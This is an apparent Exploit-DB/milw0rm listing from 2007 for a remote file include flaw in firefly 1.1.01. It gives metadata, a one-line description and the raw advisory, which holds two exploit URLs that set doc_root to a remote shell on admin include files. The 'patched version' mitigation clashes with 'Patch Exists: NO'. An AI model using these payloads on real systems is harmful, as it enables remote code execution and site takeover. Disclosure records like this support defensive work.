header-logo
Suggest Exploit
vendor:
firefly
by:
Alkomandoz Hacker
7.5
CVSS
HIGH
Remote File Include
22
CWE
Product Name: firefly
Affected Version From: 1.1.01
Affected Version To: 1.1.01
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

firefly 1.1.01 <= Remote File Include Vulnerability

The vulnerability allows an attacker to include a remote file in the application, which can lead to remote code execution.

Mitigation:

Update to a patched version of the application.
Source

Exploit-DB raw data:

# firefly 1.1.01 <=  Remote File Include Vulnerablitiy
# D.Script: http://fresh.t-systems-sfr.com/unix/src/privat2/firefly-1.1.01.tar.gz
# Discovered by: Alkomandoz Hacker
# Homepage: asb-may.net & mohandko.com & sniper-sa.com & Tryag.com

====================================
# Exploit:[Path]/modules/admin/include/localize.php?doc_root=Shell
# Exploit:[Path]/modules/admin/include/config.php?doc_root=Shell

====================================

# Greetz To:   AsbMay's Group & City Of Ghosts Team & Sniper-sa Team & No4Hard

# milw0rm.com [2007-04-26]